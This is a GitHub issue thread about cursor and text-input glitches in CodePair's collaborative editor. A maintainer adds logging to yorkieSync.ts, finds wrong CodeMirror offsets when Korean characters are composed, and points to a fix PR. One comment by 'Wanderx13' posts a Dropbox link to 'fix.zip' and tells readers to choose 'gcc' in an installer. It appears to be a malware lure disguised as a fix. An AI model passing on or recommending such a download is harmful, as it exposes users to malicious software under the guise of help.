### ISSUE TITLE
Issues with multi-user editing in CodePair causing cursor and text input glitches

### ISSUE THREAD

**Issue by devleejb** [yorkie-team/codepair#318]
**What happened**:
When multiple users access and edit simultaneously in CodePair, there are issues with cursor jumping and text input not functioning properly. This disrupts the collaborative editing experience.

**What you expected to happen**:
The editing should be smooth without any cursor jumping or issues with text input when multiple users are collaborating in CodePair.

**How to reproduce it (as minimally and precisely as possible)**:
1. Have several users join a CodePair session.
2. Begin editing the same document simultaneously.
3. Observe the cursor behavior and text input issues.

**Anything else we need to know?**:

**Environment**:
- Operating system: ALL
- Browser and version: ALL
- CodePair version: v0.1.6

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by devleejb** [comment]
I added the following log in the `yorkieSync.ts` file to test:

```typescript
update(update: cmView.ViewUpdate) {
    if (update.docChanged) {
        for (const tr of update.transactions) {
            const events = ["select", "input", "delete", "move", "undo", "redo"];
            if (!events.some((event) => tr.isUserEvent(event))) {
                continue;
            }
            if (tr.annotation(cmState.Transaction.remote)) {
                continue;
            }
            let adj = 0;
            console.log("Start Document:", tr.startState.doc.toString());
            this._doc.update((root) => {
                tr.changes.iterChanges((fromA, toA, _, __, inserted) => {
                    const insertText = inserted.toJSON().join("\n");
                    root.content.edit(fromA + adj, toA + adj, insertText);
                    console.log("Edit:", fromA + adj, toA + adj, insertText);
                    console.log("End Document:", root.content.toString());
                    adj += insertText.length - (toA - fromA);
                });
            });
        }
    }
}
```

It seems that when combining Korean consonants and vowels, the values of `fromA` and `toA` are not being passed correctly in CodeMirror.

![image](https://github.com/user-attachments/assets/0881d2dd-3bf8-4a31-9775-06cb1688a9d8)


The expected behavior should result in the following:

```
아

아
```

However, during the second edit, the values are passed as 2, 3 instead of 3, 4.
Since this issue does not occur in the CodeMirror6 Yorkie Example, further investigation is needed to identify the cause.

The same issue persists even when reverting to previous commits.

**Comment by devleejb** [comment]
Resolved in https://github.com/yorkie-team/codepair/pull/329
